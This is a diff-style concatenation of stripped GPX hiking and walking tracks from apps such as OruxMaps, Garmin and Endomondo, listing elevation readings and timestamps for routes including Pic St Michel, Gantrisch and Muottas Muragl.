+1085.299851659742
+
+
+1077.8000648063826
+
+
+1075.9001101788806
+
+
+1068.7
+
+
+1062.099900100946
+
+
+1055.4999688946534
+
+
+1045.8999861044235
+
+
+1032.499883215421
+
+
+1026.8
+
+
+1013.3001259612223
+
+
+1003.8998843298413
+
+
+1024.2000040511687
+
+
+1030.8001463896467
+
+
+1056.9
+
+
+1063.8001447066024
+
+
+1058.4935429939226
+
+
+1055.721615596222
+
+
+1052.3352575394892
+
+
+1053.5999672584437
+
+
+1009.7999861718554
+
+
+984.8
+
+
+981.1999668153021
+
+
+970.3999736768285
+
+
+974.2000004684518
+
+
+972.6000157846543
+
+
+976.699998380738
+
+
+971.7999771691403
+
+
+959.2999902147641
+
+
+954.2000251370904
+
+
+944.70009898309
+
+
+901.9999179407597
+
+
+896.5
+
+
+892.1999695128548
+
+
+885.5000071773612
+
+
+870.1999750969285
+
+
+854.5
+
+
+852.7
+
+
+852.8999984050186
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+pic St michel
+
+
+
+
+
+OruxMaps
+2016-05-05T09:10:42Z
+
+
+pic St michel
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic St michel</h2><br /><p>Startzeit: 05/05/2016 11:10</p><p>Zielzeit: 05/05/2016 12:40</p><p>Strecke: 4,8km (01:29)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4km/h</p><p>Max. Geschwindigkeit: 9km/h</p><p>Minimale Höhe: 1214m</p><p>Maximale Höhe: 1959m</p><p>Steig-Geschw.: 560,2m/h</p><p>Sink-Geschw.: -298,5m/h</p><p>Aufstieg: 758m</p><p>Abstieg: -19m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1214.63
+2016-05-05T09:10:38Z
+
+
+1281.46
+2016-05-05T09:10:41Z
+
+
+1267.92
+2016-05-05T09:12:27Z
+
+
+1279.93
+2016-05-05T09:14:20Z
+
+
+1289.94
+2016-05-05T09:16:51Z
+
+
+1286.0
+2016-05-05T09:17:26Z
+
+
+1295.42
+2016-05-05T09:17:46Z
+
+
+1311.57
+2016-05-05T09:18:59Z
+
+
+1319.82
+2016-05-05T09:19:27Z
+
+
+1336.96
+2016-05-05T09:21:20Z
+
+
+1365.05
+2016-05-05T09:24:27Z
+
+
+1390.1
+2016-05-05T09:26:31Z
+
+
+1429.8
+2016-05-05T09:30:35Z
+
+
+1433.31
+2016-05-05T09:30:52Z
+
+
+1439.64
+2016-05-05T09:31:17Z
+
+
+1446.61
+2016-05-05T09:32:02Z
+
+
+1436.08
+2016-05-05T09:32:55Z
+
+
+1444.95
+2016-05-05T09:34:07Z
+
+
+1445.79
+2016-05-05T09:35:07Z
+
+
+1445.55
+2016-05-05T09:35:33Z
+
+
+1445.9
+2016-05-05T09:35:53Z
+
+
+1449.35
+2016-05-05T09:36:06Z
+
+
+1453.7
+2016-05-05T09:36:31Z
+
+
+1458.97
+2016-05-05T09:37:04Z
+
+
+1471.42
+2016-05-05T09:38:37Z
+
+
+1468.21
+2016-05-05T09:39:10Z
+
+
+1471.46
+2016-05-05T09:39:50Z
+
+
+1480.43
+2016-05-05T09:41:21Z
+
+
+1486.05
+2016-05-05T09:42:40Z
+
+
+1506.92
+2016-05-05T09:43:23Z
+
+
+1508.54
+2016-05-05T09:44:37Z
+
+
+1534.95
+2016-05-05T09:46:25Z
+
+
+1536.57
+2016-05-05T09:47:34Z
+
+
+1549.54
+2016-05-05T09:49:01Z
+
+
+1559.15
+2016-05-05T09:50:23Z
+
+
+1585.4
+2016-05-05T09:52:17Z
+
+
+1588.48
+2016-05-05T09:53:03Z
+
+
+1600.2
+2016-05-05T09:54:02Z
+
+
+1606.49
+2016-05-05T09:55:28Z
+
+
+1621.13
+2016-05-05T09:56:33Z
+
+
+1647.07
+2016-05-05T09:58:42Z
+
+
+1680.4
+2016-05-05T10:00:50Z
+
+
+1675.57
+2016-05-05T10:01:18Z
+
+
+1683.02
+2016-05-05T10:01:55Z
+
+
+1696.47
+2016-05-05T10:03:07Z
+
+
+1698.64
+2016-05-05T10:03:35Z
+
+
+1705.69
+2016-05-05T10:04:32Z
+
+
+1736.05
+2016-05-05T10:07:50Z
+
+
+1748.01
+2016-05-05T10:09:07Z
+
+
+1759.18
+2016-05-05T10:10:54Z
+
+
+1842.04
+2016-05-05T10:19:56Z
+
+
+1845.49
+2016-05-05T10:21:15Z
+
+
+1867.55
+2016-05-05T10:24:19Z
+
+
+1869.33
+2016-05-05T10:25:38Z
+
+
+1903.54
+2016-05-05T10:29:35Z
+
+
+1927.29
+2016-05-05T10:33:58Z
+
+
+1926.63
+2016-05-05T10:35:05Z
+
+
+1927.61
+2016-05-05T10:36:48Z
+
+
+1951.02
+2016-05-05T10:39:05Z
+
+
+1959.18
+2016-05-05T10:40:38Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-09-07T17:38:09Z
+
+
+Gantrisch
+
+
+
+
+
+
+1517.097900390625
+2014-09-07T10:06:40Z
+
+
+1516.6171875
+2014-09-07T10:08:09Z
+
+
+1526.230224609375
+2014-09-07T10:09:41Z
+
+
+1533.440185546875
+2014-09-07T10:10:32Z
+
+
+1546.8984375
+2014-09-07T10:12:17Z
+
+
+1556.992431640625
+2014-09-07T10:13:30Z
+
+
+1569.48974609375
+2014-09-07T10:15:07Z
+
+
+1611.306884765625
+2014-09-07T10:20:01Z
+
+
+1627.649169921875
+2014-09-07T10:21:56Z
+
+
+1643.510986328125
+2014-09-07T10:26:01Z
+
+
+1656.969482421875
+2014-09-07T10:27:33Z
+
+
+1684.847900390625
+2014-09-07T10:30:24Z
+
+
+1695.42236328125
+2014-09-07T10:31:38Z
+
+
+1703.11279296875
+2014-09-07T10:32:37Z
+
+
+1724.74267578125
+2014-09-07T10:35:15Z
+
+
+1730.02978515625
+2014-09-07T10:36:10Z
+
+
+1744.93017578125
+2014-09-07T10:38:47Z
+
+
+1753.58203125
+2014-09-07T10:39:55Z
+
+
+1754.543212890625
+2014-09-07T10:40:30Z
+
+
+1755.985107421875
+2014-09-07T10:40:53Z
+
+
+1756.466064453125
+2014-09-07T10:41:05Z
+
+
+1767.52099609375
+2014-09-07T10:42:58Z
+
+
+1772.80859375
+2014-09-07T10:44:05Z
+
+
+1787.22802734375
+2014-09-07T10:47:02Z
+
+
+1790.5927734375
+2014-09-07T10:47:44Z
+
+
+1803.570556640625
+2014-09-07T10:50:02Z
+
+
+1812.703125
+2014-09-07T10:53:20Z
+
+
+1815.587158203125
+2014-09-07T10:55:23Z
+
+
+1813.664306640625
+2014-09-07T10:56:13Z
+
+
+1812.703125
+2014-09-07T10:57:42Z
+
+
+1812.222412109375
+2014-09-07T10:58:01Z
+
+
+1815.1064453125
+2014-09-07T11:00:06Z
+
+
+1813.664306640625
+2014-09-07T11:01:42Z
+
+
+1819.912841796875
+2014-09-07T11:03:28Z
+
+
+1874.708251953125
+2014-09-07T11:06:24Z
+
+
+1877.592041015625
+2014-09-07T11:06:42Z
+
+
+1881.91796875
+2014-09-07T11:07:11Z
+
+
+1884.80224609375
+2014-09-07T11:07:56Z
+
+
+1884.80224609375
+2014-09-07T11:08:19Z
+
+
+1885.763427734375
+2014-09-07T11:20:01Z
+
+
+1930.9453125
+2014-09-07T11:24:50Z
+
+
+1947.28759765625
+2014-09-07T11:26:40Z
+
+
+2004.486083984375
+2014-09-07T11:32:30Z
+
+
+1982.8564453125
+2014-09-07T11:38:07Z
+
+
+2000.640869140625
+2014-09-07T11:41:44Z
+
+
+2027.0771484375
+2014-09-07T11:44:42Z
+
+
+2096.292236328125
+2014-09-07T11:55:08Z
+
+
+2131.86083984375
+2014-09-07T11:59:42Z
+
+
+2152.04833984375
+2014-09-07T12:07:06Z
+ "
+"
+
+
+Tourenplanung am 18. März 2017
+
+Holger Stein - Community
+
+
+
+2017-03-18T18:34:11Z
+
+Tourenplanung am 18. März 2017
+
+
+
+49.9
+
+
+50.2
+
+
+53.2
+
+
+31.4
+
+
+9.0
+
+
+14.1
+
+
+4.9
+ "
+"
+
+
+2015-05-01_12-02_ven.gpx
+
+
+
+
+
+venerdì 1 maggio 2015
+
+
+
+339.66
+2015-05-01T10:02:20Z
+
+4.0
+
+
+
+340.86
+2015-05-01T10:03:06Z
+
+3.0
+
+344.36
+2015-05-01T10:05:10Z
+
+10.0
+
+386.66
+2015-05-01T10:09:02Z
+
+10.0
+
+
+
+396.96
+2015-05-01T10:10:51Z
+
+9.0
+
+406.96
+2015-05-01T10:13:11Z
+
+3.0
+
+434.16
+2015-05-01T10:16:01Z
+
+4.0
+
+
+
+458.66
+2015-05-01T10:18:06Z
+
+10.0
+
+
+
+511.06
+2015-05-01T10:28:25Z
+
+10.0
+
+
+
+526.06
+2015-05-01T10:32:03Z
+
+10.0
+
+
+
+560.36
+2015-05-01T10:35:24Z
+
+9.0
+
+563.86
+2015-05-01T10:37:13Z
+
+9.0
+
+573.16
+2015-05-01T10:39:00Z
+
+9.0
+
+584.36
+2015-05-01T10:40:17Z
+
+9.0
+
+604.26
+2015-05-01T10:42:22Z
+
+3.0
+
+647.46
+2015-05-01T10:55:02Z
+
+9.0
+
+670.76
+2015-05-01T10:58:24Z
+
+9.0
+
+691.36
+2015-05-01T10:59:57Z
+
+4.0
+
+
+
+709.86
+2015-05-01T11:00:59Z
+
+9.0
+
+713.06
+2015-05-01T11:05:38Z
+
+4.0
+
+
+
+741.66
+2015-05-01T11:16:00Z
+
+3.0
+
+
+
+758.06
+2015-05-01T11:17:50Z
+
+4.0
+
+
+
+765.46
+2015-05-01T11:21:42Z
+
+3.0
+
+817.66
+2015-05-01T11:31:44Z
+
+3.0
+
+828.56
+2015-05-01T11:45:13Z
+
+4.0
+
+#fbaf00
+#1 "
+"
+
+
+
+Silvia Sigorini
+
+
+
+
+Endomondo
+2015-05-04T07:18:39Z
+
+http://www.endomondo.com/
+
+endomondo
+WALKING
+
+
+2015-05-03T09:42:32Z
+
+
+268.9
+2015-05-03T09:44:43Z
+
+
+272.6
+2015-05-03T09:45:00Z
+
+
+265.7
+2015-05-03T09:46:06Z
+
+
+275.7
+2015-05-03T09:46:55Z
+
+
+265.7
+2015-05-03T09:47:46Z
+
+
+264.0
+2015-05-03T09:47:56Z
+
+
+267.6
+2015-05-03T09:48:31Z
+
+
+282.5
+2015-05-03T09:49:40Z
+
+
+296.4
+2015-05-03T09:50:42Z
+
+
+294.9
+2015-05-03T09:51:10Z
+
+
+292.3
+2015-05-03T09:51:27Z
+
+
+304.3
+2015-05-03T09:52:24Z
+
+
+313.3
+2015-05-03T09:53:40Z
+
+
+353.1
+2015-05-03T09:54:32Z
+
+
+396.8
+2015-05-03T09:56:24Z
+
+
+395.2
+2015-05-03T09:57:52Z
+
+
+390.1
+2015-05-03T10:00:17Z
+
+
+389.9
+2015-05-03T10:00:33Z
+
+
+388.6
+2015-05-03T10:01:13Z
+
+
+387.8
+2015-05-03T10:01:30Z
+
+
+401.8
+2015-05-03T10:02:28Z
+
+
+418.6
+2015-05-03T10:03:45Z
+
+
+447.7
+2015-05-03T10:05:40Z
+
+
+449.5
+2015-05-03T10:05:51Z
+
+
+458.8
+2015-05-03T10:06:43Z
+
+
+494.7
+2015-05-03T10:08:18Z
+
+
+2015-05-03T10:12:01Z
+
+
+
+2015-05-03T10:13:20Z
+
+
+498.0
+2015-05-03T10:15:11Z
+
+
+484.2
+2015-05-03T10:16:35Z
+
+
+476.8
+2015-05-03T10:16:59Z
+
+
+490.7
+2015-05-03T10:18:32Z
+
+
+500.5
+2015-05-03T10:19:47Z
+
+
+501.5
+2015-05-03T10:22:56Z
+
+
+2015-05-03T10:25:27Z
+
+
+
+2015-05-03T10:30:34Z
+
+
+492.1
+2015-05-03T10:32:05Z
+
+
+494.4
+2015-05-03T10:32:49Z
+
+
+492.7
+2015-05-03T10:34:23Z
+
+
+486.8
+2015-05-03T10:35:52Z
+
+
+492.7
+2015-05-03T10:37:27Z
+
+
+492.1
+2015-05-03T10:38:17Z
+
+
+484.6
+2015-05-03T10:38:53Z
+
+
+477.6
+2015-05-03T10:39:30Z
+
+
+464.2
+2015-05-03T10:41:14Z
+
+
+446.3
+2015-05-03T10:42:11Z
+
+
+429.1
+2015-05-03T10:44:31Z
+
+
+394.5
+2015-05-03T10:46:50Z
+
+
+384.5
+2015-05-03T10:47:25Z
+
+
+387.1
+2015-05-03T10:47:56Z
+
+
+384.9
+2015-05-03T10:50:02Z
+
+
+375.0
+2015-05-03T10:50:56Z
+
+
+380.2
+2015-05-03T10:51:18Z
+
+
+315.6
+2015-05-03T10:55:55Z
+
+
+294.1
+2015-05-03T10:57:09Z
+
+
+297.2
+2015-05-03T10:57:31Z
+
+
+274.6
+2015-05-03T10:58:34Z
+
+
+260.2
+2015-05-03T11:00:00Z
+
+
+264.0
+2015-05-03T11:00:21Z
+
+
+264.1
+2015-05-03T11:01:11Z
+
+
+268.7
+2015-05-03T11:02:47Z
+
+
+265.0
+2015-05-03T11:03:16Z
+
+
+259.3
+2015-05-03T11:04:30Z
+
+
+254.9
+2015-05-03T11:06:30Z
+
+
+259.5
+2015-05-03T11:06:40Z
+
+
+264.0
+2015-05-03T11:07:05Z
+
+
+275.2
+2015-05-03T11:07:13Z
+
+
+2015-05-03T11:07:55Z
+
+
+
+2015-05-03T11:08:03Z
+ "
+"
+
+
+2016-07-24T08:41:25+0200
+
+
+1460.0
+
+1462.1305241679938
+
+1464.9881208521253
+
+1469.3001563241626
+
+1477.95277546878
+
+1482.7516451341346
+
+1492.318162568008
+
+1530.6523479096597
+
+1536.7921476559031
+
+1552.6956171611735
+
+1575.751817173198
+
+1583.862056123387
+
+1593.997848860574
+
+1608.1770994709582
+
+1629.2077486678859
+
+1646.6555034235512
+
+1655.5407493406624
+
+1682.4476969521672
+
+1708.2232183166907
+
+1723.362096943849
+
+1720.4682751619855
+
+1756.4482511902895
+
+1762.6455775459526
+
+1757.504377230836
+
+1763.5267423434664
+
+1760.8826840098757
+
+1765.9032749561632
+
+1789.8315333190296
+
+1803.5598307464968
+
+1815.2561394569846
+
+1827.0862420515184
+
+1849.3049905125429
+
+1857.9705488273416
+
+1867.4287220002923
+
+1887.076148946134
+
+1912.9837104494725
+
+1921.4652760517638
+
+1936.2508329401985
+
+1963.5728260692542
+
+2001.5445004399717
+
+2042.0757673409987
+
+2047.6819153983197
+
+2059.929022827194
+
+2070.2193482601215
+
+2082.6395860175144
+
+2121.628689699362
+
+2140.7643682637145
+
+2141.7977404710973
+
+2161.3510392509606
+
+2178.3930158357034
+
+2196.682867070238
+
+2217.1489615094556
+
+2226.128938581397
+
+2256.6970219396107
+
+2305.1690883718384
+
+2312.9398643401637
+
+2315.93070436358
+
+2327.861839273584
+
+2343.6462821215728
+
+2345.2035553326045
+
+2350.9335501236087
+
+2352.9647349888087
+
+2359.337132051706
+
+2388.3990929808188
+
+2444.3675601514265
+
+2456.4462188822745
+
+2474.2586498870855
+
+2483.303475262201
+
+2522.436905888874
+
+2532.8537955288875
+
+2537.548224359725
+
+2534.1900627481145
+
+2525.068730364287
+
+2511.136338678157
+
+2496.1869778415085
+
+2480.4485051575407
+
+2456.8844196308405
+
+2448.094663667162
+
+2448.0102607831163 "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-12-19T08:46:16Z
+
+Muottas Muragl
+
+
+
+1786.5999755859375
+2015-12-19T08:46:16Z
+
+
+1789.800048828125
+2015-12-19T08:46:46Z
+
+
+1814.800048828125
+2015-12-19T08:49:00Z
+
+
+1843.5999755859375
+2015-12-19T08:51:20Z
+
+
+1877.5999755859375
+2015-12-19T08:54:47Z
+
+
+1893.4000244140625
+2015-12-19T08:56:18Z
+
+
+1907.800048828125
+2015-12-19T08:57:14Z
+
+
+1926.199951171875
+2015-12-19T08:58:35Z
+
+
+1929.800048828125
+2015-12-19T08:59:04Z
+
+
+1927.5999755859375
+2015-12-19T09:00:57Z
+
+
+1951.199951171875
+2015-12-19T09:02:37Z
+
+
+1952.4000244140625
+2015-12-19T09:03:46Z
+
+
+1959.0
+2015-12-19T09:04:21Z
+
+
+1969.5999755859375
+2015-12-19T09:05:09Z
+
+
+1977.5999755859375
+2015-12-19T09:06:32Z
+
+
+2041.4000244140625
+2015-12-19T09:09:06Z
+
+
+2038.0
+2015-12-19T09:10:37Z
+
+
+2057.199951171875
+2015-12-19T09:12:44Z
+
+
+2072.0
+2015-12-19T09:13:27Z
+
+
+2072.39990234375
+2015-12-19T09:14:39Z
+
+
+2111.0
+2015-12-19T09:18:09Z
+
+
+2122.39990234375
+2015-12-19T09:18:58Z
+
+
+2191.800048828125
+2015-12-19T09:23:14Z
+
+
+2168.60009765625
+2015-12-19T09:25:54Z
+
+
+2165.199951171875
+2015-12-19T09:26:16Z
+
+
+2212.39990234375
+2015-12-19T09:27:49Z
+
+
+2191.39990234375
+2015-12-19T09:29:06Z
+
+
+2209.39990234375
+2015-12-19T09:29:55Z
+
+
+2212.800048828125
+2015-12-19T09:32:20Z
+
+
+2229.800048828125
+2015-12-19T09:34:36Z
+
+
+2260.39990234375
+2015-12-19T09:36:58Z
+
+
+2268.199951171875
+2015-12-19T09:39:01Z
+
+
+2289.39990234375
+2015-12-19T09:40:43Z
+
+
+2313.60009765625
+2015-12-19T09:42:24Z
+
+
+2341.39990234375
+2015-12-19T09:43:54Z
+
+
+2354.800048828125
+2015-12-19T09:46:24Z
+
+
+2387.39990234375
+2015-12-19T09:48:36Z
+
+
+2395.39990234375
+2015-12-19T09:49:43Z
+
+
+2403.199951171875
+2015-12-19T09:50:11Z
+
+
+2408.39990234375
+2015-12-19T09:52:14Z
+
+
+2426.60009765625
+2015-12-19T09:53:38Z
+
+
+2443.800048828125
+2015-12-19T09:54:52Z
+
+
+2451.60009765625
+2015-12-19T09:57:06Z
+ "
+"
+
+
+
+
+
+
+
+2015-09-28 14:08:44
+
+
+
+2255.87
+
+
+2261.64
+
+
+2264.52
+
+
+2275.1
+
+
+2291.44
+
+
+2291.44
+
+
+2296.25
+
+
+2297.69
+
+
+2317.88
+
+
+2326.05
+
+
+2330.85
+
+
+2360.65
+
+
+2372.19
+
+
+2384.21
+
+
+2392.38
+
+
+2407.28
+
+
+2446.21
+
+
+2460.63
+
+
+2485.63
+
+
+2489.95
+
+
+2497.64
+
+
+2500.53
+
+
+2504.37
+
+
+2511.1
+
+
+2517.35
+
+
+2515.43
+
+
+2508.7
+
+
+2501.97
+
+
+2505.81
+
+
+2514.95
+
+
+2517.35
+
+
+2526.48
+
+
+2530.81
+
+
+2536.1
+
+
+2538.98
+
+
+2543.79
+
+
+2545.71
+
+
+2545.23
+
+
+2546.19
+
+
+2543.31
+
+
+2541.38
+
+
+2539.94
+
+
+2541.86
+
+
+2545.23
+
+
+2556.76
+
+
+2560.61
+
+
+2567.82
+
+
+2574.07
+
+
+2576.95
+
+
+2590.41
+
+
+2582.24
+
+
+2575.51
+
+
+2563.97
+
+
+2550.51
+
+
+2547.63
+
+
+2550.03
+
+
+2549.07
+
+
+2550.03
+
+
+2551.48
+
+
+2551.0
+
+
+2550.03
+
+
+2548.59
+
+
+2547.63
+
+
+2543.31
+
+
+2541.38
+
+
+2536.1
+
+
+2529.37
+
+
+2521.19
+
+
+2516.87
+
+
+2508.7
+
+
+2510.14
+
+
+2514.47
+
+
+2516.87
+
+
+2512.06
+
+
+2503.41
+
+
+2500.05
+
+
+2496.68
+
+
+2489.47
+
+
+2484.18
+
+
+2458.71
+
+
+2443.33
+
+
+2405.84
+
+
+2393.82
+
+
+2383.73
+
+
+2373.63
+
+
+2358.25
+
+
+2327.49
+
+
+2324.12
+
+
+2319.8
+
+
+2312.11
+
+
+2296.25
+
+
+2293.36
+
+
+2289.52
+
+
+2289.52
+
+
+2260.68
+
+
+2253.47
+
+
+2251.54
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-02-23T17:30:13Z
+
+
+Aktueller Track: 22 FEB 2014 12:39
+
+
+
+
+
+
+353.9
+2014-02-22T11:40:29Z
+
+
+353.42
+2014-02-22T11:40:46Z
+
+
+352.94
+2014-02-22T11:41:18Z
+
+
+352.94
+2014-02-22T11:42:12Z
+
+
+352.94
+2014-02-22T11:42:20Z
+
+
+351.02
+2014-02-22T11:45:15Z
+
+
+352.94
+2014-02-22T11:45:58Z
+
+
+352.46
+2014-02-22T11:47:51Z
+
+
+349.58
+2014-02-22T11:51:06Z
+
+
+347.65
+2014-02-22T11:51:44Z
+
+
+348.62
+2014-02-22T11:55:39Z
+
+
+340.3671875
+
+
+340.73046875
+
+
+345.73
+2014-02-22T11:57:25Z
+
+
+346.21
+2014-02-22T11:59:29Z
+
+
+346.69
+2014-02-22T12:00:42Z
+
+
+348.13
+2014-02-22T12:01:57Z
+
+
+348.62
+2014-02-22T12:03:51Z
+
+
+348.13
+2014-02-22T12:05:18Z
+
+
+355.83
+2014-02-22T12:12:21Z
+
+
+352.46
+2014-02-22T12:13:50Z
+
+
+346.69
+2014-02-22T12:15:17Z
+
+
+345.25
+2014-02-22T12:18:10Z
+
+
+344.77
+2014-02-22T12:21:02Z
+
+
+344.29
+2014-02-22T12:27:08Z
+
+
+343.81
+2014-02-22T12:28:59Z
+
+
+342.85
+2014-02-22T12:30:33Z
+
+
+343.81
+2014-02-22T12:31:54Z
+
+
+349.58
+2014-02-22T12:45:42Z
+
+
+346.69
+2014-02-22T12:46:35Z
+
+
+341.89
+2014-02-22T12:47:57Z
+
+
+345.25
+2014-02-22T12:51:18Z
+
+
+343.33
+2014-02-22T12:52:41Z
+
+
+343.33
+2014-02-22T12:53:08Z
+
+
+343.33
+2014-02-22T12:54:13Z
+
+
+342.37
+2014-02-22T12:58:20Z
+
+
+341.89
+2014-02-22T12:59:33Z
+
+
+342.37
+2014-02-22T12:59:54Z
+
+
+344.77
+2014-02-22T13:00:50Z
+
+
+344.29
+2014-02-22T13:03:19Z
+
+
+344.77
+2014-02-22T13:05:58Z
+
+
+341.89
+2014-02-22T13:07:28Z
+
+
+346.21
+2014-02-22T13:14:22Z
+
+
+345.73
+2014-02-22T13:15:18Z
+
+
+345.25
+2014-02-22T13:16:36Z
+
+
+344.29
+2014-02-22T13:17:22Z
+
+
+344.77
+2014-02-22T13:17:51Z
+
+
+344.77
+2014-02-22T13:23:25Z
+
+
+344.29
+2014-02-22T13:24:54Z
+
+
+344.77
+2014-02-22T13:28:32Z
+
+
+342.37
+2014-02-22T13:30:23Z
+
+
+343.33
+2014-02-22T13:30:50Z
+
+
+348.13
+2014-02-22T13:31:33Z
+
+
+343.33
+2014-02-22T13:33:54Z
+
+
+344.77
+2014-02-22T13:36:59Z
+
+
+344.29
+2014-02-22T13:38:36Z
+
+
+344.77
+2014-02-22T13:39:38Z
+
+
+344.29
+2014-02-22T13:41:10Z
+
+
+344.29
+2014-02-22T13:41:28Z
+
+
+344.29
+2014-02-22T13:44:02Z
+
+
+344.29
+2014-02-22T13:46:00Z
+
+
+344.29
+2014-02-22T13:46:57Z
+
+
+341.89
+2014-02-22T13:47:40Z
+ "
+"
+
+
+
+
+
+
+
+Linie
+Erfassung über BayernAtlas
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-28T12:49:24Z
+
+28-JUL-15 14:49:20
+
+
+
+
+
+1763.68
+2015-07-28T05:13:32Z
+
+
+1787.71
+2015-07-28T05:15:48Z
+
+
+1791.07
+2015-07-28T05:17:11Z
+
+
+1795.4
+2015-07-28T05:19:28Z
+
+
+1812.22
+2015-07-28T05:21:42Z
+
+
+1820.87
+2015-07-28T05:23:28Z
+
+
+1822.32
+2015-07-28T05:26:16Z
+
+
+1830.01
+2015-07-28T05:28:19Z
+
+
+1855.0
+2015-07-28T05:31:17Z
+
+
+1883.36
+2015-07-28T05:34:30Z
+
+
+1917.49
+2015-07-28T05:38:44Z
+
+
+1953.06
+2015-07-28T05:43:23Z
+
+
+1997.76
+2015-07-28T05:48:40Z
+
+
+2035.25
+2015-07-28T05:53:03Z
+
+
+2072.74
+2015-07-28T05:57:26Z
+
+
+2149.16
+2015-07-28T06:08:35Z
+
+
+2181.37
+2015-07-28T06:12:37Z
+
+
+2226.07
+2015-07-28T06:18:35Z
+
+
+2239.53
+2015-07-28T06:23:13Z
+
+
+2238.09
+2015-07-28T06:31:12Z
+
+
+2261.64
+2015-07-28T06:36:01Z
+
+
+2282.79
+2015-07-28T06:39:27Z
+
+
+2303.94
+2015-07-28T06:42:26Z
+
+
+2339.02
+2015-07-28T06:46:42Z
+
+
+2357.29
+2015-07-28T06:50:11Z
+
+
+2390.46
+2015-07-28T06:54:34Z
+
+
+2434.2
+2015-07-28T06:59:56Z
+
+
+2485.15
+2015-07-28T07:06:01Z
+
+
+2477.45
+2015-07-28T07:10:05Z
+
+
+2484.18
+2015-07-28T07:12:22Z
+
+
+2517.83
+2015-07-28T07:17:20Z
+
+
+2531.77
+2015-07-28T07:20:16Z
+
+
+2537.06
+2015-07-28T07:22:11Z
+
+
+2621.65
+2015-07-28T07:34:18Z
+
+
+2646.17
+2015-07-28T07:48:38Z
+
+
+2676.45
+2015-07-28T07:53:41Z
+
+
+2734.61
+2015-07-28T08:06:21Z
+
+
+2771.14
+2015-07-28T08:13:30Z
+
+
+2893.71
+2015-07-28T08:38:58Z
+
+
+3063.86
+2015-07-28T09:14:32Z
+
+
+3117.69
+2015-07-28T09:22:34Z
+
+
+3085.01
+2015-07-28T10:14:18Z
+
+
+3049.92
+2015-07-28T10:18:38Z
+
+
+2992.72
+2015-07-28T10:22:37Z
+
+
+2876.88
+2015-07-28T10:38:36Z
+
+
+2849.48
+2015-07-28T10:43:37Z
+
+
+2746.14
+2015-07-28T10:59:21Z
+
+
+2679.81
+2015-07-28T11:09:45Z
+
+
+2638.96
+2015-07-28T11:13:59Z
+
+
+2620.21
+2015-07-28T11:20:28Z
+
+
+2546.19
+2015-07-28T11:29:45Z
+
+
+2520.71
+2015-07-28T11:34:15Z
+
+
+2461.11
+2015-07-28T11:40:49Z
+
+
+2451.02
+2015-07-28T11:43:22Z
+
+
+2418.81
+2015-07-28T11:46:55Z
+
+
+2377.0
+2015-07-28T11:52:34Z
+
+
+2277.98
+2015-07-28T12:00:36Z
+
+
+2233.76
+2015-07-28T12:03:47Z
+
+
+2188.58
+2015-07-28T12:14:24Z
+
+
+2113.6
+2015-07-28T12:24:16Z
+
+
+2072.74
+2015-07-28T12:28:26Z
+
+
+1994.39
+2015-07-28T12:34:43Z
+
+
+1967.96
+2015-07-28T12:38:31Z
+
+
+1929.98
+2015-07-28T12:43:05Z
+
+
+1927.58
+2015-07-28T12:46:52Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-10-21T19:42:51Z
+
+
+Malpas-penjaroja-6000m-468hoch-185ab-540-260
+
+
+
+
+
+
+22.0
+2010-01-01T00:00:00Z
+
+
+13.0
+2010-01-01T00:01:13Z
+
+
+7.0
+2010-01-01T00:01:56Z
+
+
+6.0
+2010-01-01T00:02:11Z
+
+
+6.0
+2010-01-01T00:03:14Z
+
+
+20.0
+2010-01-01T00:04:55Z
+
+
+18.0
+2010-01-01T00:08:05Z
+
+
+13.0
+2010-01-01T00:08:21Z
+
+
+9.0
+2010-01-01T00:08:38Z
+
+
+3.0
+2010-01-01T00:09:20Z
+
+
+5.0
+2010-01-01T00:09:49Z
+
+
+12.0
+2010-01-01T00:10:14Z
+
+
+27.0
+2010-01-01T00:10:56Z
+
+
+31.0
+2010-01-01T00:11:22Z
+
+
+24.0
+2010-01-01T00:11:44Z
+
+
+29.0
+2010-01-01T00:12:22Z
+
+
+21.0
+2010-01-01T00:12:42Z
+
+
+20.0
+2010-01-01T00:13:14Z
+
+
+21.0
+2010-01-01T00:14:12Z
+
+
+23.0
+2010-01-01T00:14:52Z
+
+
+43.0
+2010-01-01T00:15:39Z
+
+
+47.0
+2010-01-01T00:15:55Z
+
+
+42.0
+2010-01-01T00:16:27Z
+
+
+48.0
+2010-01-01T00:16:49Z
+
+
+70.0
+2010-01-01T00:17:42Z
+
+
+73.0
+2010-01-01T00:18:08Z
+
+
+82.0
+2010-01-01T00:18:27Z
+
+
+94.0
+2010-01-01T00:18:45Z
+
+
+90.0
+2010-01-01T00:19:11Z
+
+
+89.0
+2010-01-01T00:19:28Z
+
+
+90.0
+2010-01-01T00:19:48Z
+
+
+105.0
+2010-01-01T00:20:08Z
+
+
+116.0
